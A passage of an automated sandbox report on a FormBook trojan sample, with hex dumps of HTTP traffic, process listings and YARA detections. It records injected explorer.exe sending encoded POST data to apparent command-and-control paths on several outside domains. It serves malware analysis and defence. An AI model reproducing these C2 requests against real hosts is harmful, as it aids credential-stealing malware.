                                                                                            Mar 20, 2023 17:00:09.394748926 CET115INData Raw: 35 37 31 0d 0a 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 73 77 69 74 63 68 20 69 6e 70 75 74 7b 6f 70 61 63 69 74 79 3a 30 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 7d 2e 73 77 69 74 63 68 7b
                                                                                            Data Ascii: 571olor:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#5a
                                                                                            Mar 20, 2023 17:00:09.394840002 CET116INData Raw: 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 22 2c 22 61 64 62 6c 6f 63 6b 6b 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77
                                                                                            Data Ascii: //img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBAE5fvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_QPULJblWboldIJf98prPeU7lokMyBifrea6AkwSgkyEmS0otXo1/Q
                                                                                            Mar 20, 2023 17:00:09.413861036 CET118INData Raw: 78 4f 54 6b 33 43 54 45 77 4d 69 34 78 4d 6a 6b 75 4d 54 51 7a 4c 6a 63 34 43 54 41 25 33 44 22 2c 22 61 6c 74 65 72 6e 61 74 65 22 3a 22 4f 41 6c 6b 4e 7a 6b 35 59 6a 63 79 59 57 51 7a 59 54 49 35 59 32 49 33 4f 57 46 6c 59 57 59 34 5a 6a 49 7a
                                                                                            Data Ascii: xOTk3CTEwMi4xMjkuMTQzLjc4CTA%3D","alternate":"OAlkNzk5YjcyYWQzYTI5Y2I3OWFlYWY4ZjIzNWM2OTVmYwkxMjEwCTIwCTAJCTQ3NjI4MDQ5OAkyMjJhbWJraW5nCTMwNDkJMQkxCTE2CTE2NzkzMjgwMDkJMAlOCTAJMAkwCTEyMDUJNDY0MDkxOTk3CTEwMi4xMjkuMTQzLjc4CTA%3D"},"visitorViewIdJs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            7192.168.2.449703213.145.228.11180C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:15.542984962 CET128OUTPOST /u2kb/ HTTP/1.1
                                                                                            Host: www.energyservicestation.com
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.energyservicestation.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.energyservicestation.com/u2kb/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 73 37 3d 46 49 52 64 59 4b 38 32 4c 68 41 7a 31 6a 42 33 4d 78 4e 54 5a 6f 4c 64 69 36 69 51 50 5a 64 42 37 56 4f 57 36 76 53 4f 54 32 4c 61 66 36 66 4f 31 72 61 75 7e 68 75 74 79 65 6a 42 31 62 6f 6c 75 31 59 42 73 6e 75 4c 70 4c 6b 45 76 38 46 47 58 5a 79 74 41 6e 46 72 76 55 34 70 51 42 6e 46 56 52 68 76 52 55 43 4c 59 6d 6f 52 45 39 50 41 28 7a 37 32 68 6f 61 6e 42 61 74 51 43 34 59 39 71 5f 30 32 76 54 6a 6a 4e 41 4b 46 55 37 73 48 62 36 70 36 4c 4a 65 5a 28 51 66 4f 71 5a 31 74 50 46 49 30 53 72 65 66 77 55 32 64 6e 74 64 44 6a 51 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: s7=FIRdYK82LhAz1jB3MxNTZoLdi6iQPZdB7VOW6vSOT2Laf6fO1rau~hutyejB1bolu1YBsnuLpLkEv8FGXZytAnFrvU4pQBnFVRhvRUCLYmoRE9PA(z72hoanBatQC4Y9q_02vTjjNAKFU7sHb6p6LJeZ(QfOqZ1tPFI0SrefwU2dntdDjQ).
                                                                                            Mar 20, 2023 17:00:15.750376940 CET129INHTTP/1.1 404 Not Found
                                                                                            Date: Mon, 20 Mar 2023 16:00:15 GMT
                                                                                            Server: Apache/2.4.54 (Debian)
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            Strict-Transport-Security: max-age=63072000; preload
                                                                                            Connection: Upgrade, close
                                                                                            Transfer-Encoding: chunked
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Data Raw: 64 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 64 6f 6d 61 69 6e 2d 72 65 67 69 73 74 72 69 65 72 65 6e 2e 68 74 6d 6c 22 20 74 69 74 6c 65 3d 22 44 6f 6d 61 69 6e 20 63 68 65 63 6b 20 61 6e 64 20 72 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 52 65 67 69 73 74
                                                                                            Data Ascii: dc2<!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <base href="https://alldomains.hosting/" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="utf-8" /> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="/parking/styles.css" media="all" /> <title>Domain energyservicestation.com registered at alldomains.hosting</title></head><body><div id="parking_page_header"> <div id="parking_page_header_inner"><img src="/parking/img/alldomains_logo.png" alt="alldomains.hosting Logo" /></div></div><div id="content"> <h1>The domain <span style="font-size:1.2em;font-weight:bold;">energyservicestation.com</span> is registered for a customer.</h1> <p> Become a alldomains.hosting customer and benefit from the numerous advantages!<br /> <a href="https://alldomains.hosting/domain-registrieren.html" title="Domain check and register domain" rel="nofollow">Regist
                                                                                            Mar 20, 2023 17:00:15.750427961 CET130INData Raw: 65 72 20 61 20 64 6f 6d 61 69 6e 3c 2f 61 3e 20 69 6e 20 61 20 66 65 77 20 65 61 73 79 20 73 74 65 70 73 2e 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 4f 72 64 65 72 20 61 20 63 68 65 61 70 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                                                            Data Ascii: er a domain</a> in a few easy steps.<br /> Order a cheap <a href="https://alldomains.hosting/hosting-webhosting.html" title="Order Hosting" rel="nofollow">Hosting package</a> for your domain. </p> <div id="parking_boxes"><div
                                                                                            Mar 20, 2023 17:00:15.750452995 CET132INData Raw: 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 20 6d 61 78 2d 77 69 64 74 68 3a 34 31 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67
                                                                                            Data Ascii: v><div style="display:inline-block; vertical-align:top; max-width:410px; text-align:left;"><h2>Contao CMS Hosting</h2><table><tr><td style="width:100px; text-align:right; padding: 0px 5px 0px 0px;"><img src="/parking/img/contao.png" alt="Conta
                                                                                            Mar 20, 2023 17:00:15.758713961 CET132INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            8192.168.2.449704213.145.228.11180C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:18.097170115 CET132OUTGET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1
                                                                                            Host: www.energyservicestation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Mar 20, 2023 17:00:18.309756041 CET134INHTTP/1.1 404 Not Found
                                                                                            Date: Mon, 20 Mar 2023 16:00:18 GMT
                                                                                            Server: Apache/2.4.54 (Debian)
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            Strict-Transport-Security: max-age=63072000; preload
                                                                                            Connection: Upgrade, close
                                                                                            Transfer-Encoding: chunked
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Data Raw: 65 30 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 64 6f 6d 61 69 6e 2d 72 65 67 69 73 74 72 69 65 72 65 6e 2e 68 74 6d 6c 22 20 74 69 74 6c 65 3d 22 44 6f 6d 61 69 6e 20 63 68 65 63 6b 20 61 6e 64 20 72 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 52 65 67 69 73 74
                                                                                            Data Ascii: e02<!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <base href="https://alldomains.hosting/" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="utf-8" /> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="/parking/styles.css" media="all" /> <title>Domain energyservicestation.com registered at alldomains.hosting</title></head><body><div id="parking_page_header"> <div id="parking_page_header_inner"><img src="/parking/img/alldomains_logo.png" alt="alldomains.hosting Logo" /></div></div><div id="content"> <h1>The domain <span style="font-size:1.2em;font-weight:bold;">energyservicestation.com</span> is registered for a customer.</h1> <p> Become a alldomains.hosting customer and benefit from the numerous advantages!<br /> <a href="https://alldomains.hosting/domain-registrieren.html" title="Domain check and register domain" rel="nofollow">Regist
                                                                                            Mar 20, 2023 17:00:18.309793949 CET135INData Raw: 65 72 20 61 20 64 6f 6d 61 69 6e 3c 2f 61 3e 20 69 6e 20 61 20 66 65 77 20 65 61 73 79 20 73 74 65 70 73 2e 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 4f 72 64 65 72 20 61 20 63 68 65 61 70 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                                                            Data Ascii: er a domain</a> in a few easy steps.<br /> Order a cheap <a href="https://alldomains.hosting/hosting-webhosting.html" title="Order Hosting" rel="nofollow">Hosting package</a> for your domain. </p> <div id="parking_boxes"><div
                                                                                            Mar 20, 2023 17:00:18.309813023 CET136INData Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 20 6d 61 78 2d 77 69 64 74 68 3a 34 31 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 22 3e
                                                                                            Data Ascii: yle="display:inline-block; vertical-align:top; max-width:410px; text-align:left;"><h2>alldomains.hosting <a href="https://alldomains.hosting/e-mail-server.html" title="Mailer packages" rel="nofollow">Mailer packages</a></h2><table><tr><td styl
                                                                                            Mar 20, 2023 17:00:18.309829950 CET136INData Raw: 6d 6c 3e 0a 0d 0a
                                                                                            Data Ascii: ml>
                                                                                            Mar 20, 2023 17:00:18.315315962 CET136INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            9192.168.2.44970581.17.18.19880C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:23.411557913 CET138OUTPOST /u2kb/ HTTP/1.1
                                                                                            Host: www.younrock.com
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.younrock.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.younrock.com/u2kb/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 73 37 3d 35 37 46 76 7a 66 53 6e 68 6b 4f 5f 28 4b 75 55 4d 55 59 6c 38 30 64 6c 58 73 45 77 53 69 63 55 38 56 68 69 33 71 5a 63 59 6d 44 72 4b 2d 45 35 4e 69 31 42 50 53 55 68 6c 46 68 74 36 6e 36 6e 57 64 50 4f 30 70 66 69 38 57 42 56 37 50 37 6d 61 4c 76 76 35 32 6a 39 43 31 6e 6f 49 62 36 4b 35 67 64 36 73 69 33 30 52 70 32 30 30 6f 71 58 58 74 53 6d 7e 64 34 48 50 35 69 45 72 39 46 46 6f 33 67 67 4b 70 75 79 48 6b 33 46 41 70 73 7a 62 4b 66 67 62 41 75 47 52 54 4e 32 71 37 50 4d 67 69 47 48 57 42 58 35 6a 6a 42 67 52 71 76 48 56 41 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: s7=57FvzfSnhkO_(KuUMUYl80dlXsEwSicU8Vhi3qZcYmDrK-E5Ni1BPSUhlFht6n6nWdPO0pfi8WBV7P7maLvv52j9C1noIb6K5gd6si30Rp200oqXXtSm~d4HP5iEr9FFo3ggKpuyHk3FApszbKfgbAuGRTN2q7PMgiGHWBX5jjBgRqvHVA).
                                                                                            Mar 20, 2023 17:00:23.439126015 CET138INHTTP/1.1 302 Found
                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                            connection: close
                                                                                            content-length: 11
                                                                                            date: Mon, 20 Mar 2023 16:00:23 GMT
                                                                                            location: http://survey-smiles.com
                                                                                            server: nginx
                                                                                            set-cookie: sid=5279c3e0-c738-11ed-930c-5bbe181f8c48; path=/; domain=.younrock.com; expires=Sat, 07 Apr 2091 19:14:30 GMT; max-age=2147483647; HttpOnly
                                                                                            Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                            Data Ascii: Redirecting


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:16:59:05
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:299717 bytes
                                                                                            MD5 hash:C7714B273571BA64C0B77AFCA236AC6D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:16:59:05
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
                                                                                            Imagebase:0x400000
                                                                                            File size:95232 bytes
                                                                                            MD5 hash:6D30D26416D626447BA4298A59111F6D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 39%, ReversingLabs
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:16:59:05
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7c72c0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:16:59:06
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:95232 bytes
                                                                                            MD5 hash:6D30D26416D626447BA4298A59111F6D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:16:59:12
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Windows\explorer.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                            Imagebase:0x7ff618f60000
                                                                                            File size:3933184 bytes
                                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:16:59:25
                                                                                            Start date:20/03/2023
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                            Imagebase:0xd90000
                                                                                            File size:232960 bytes
                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
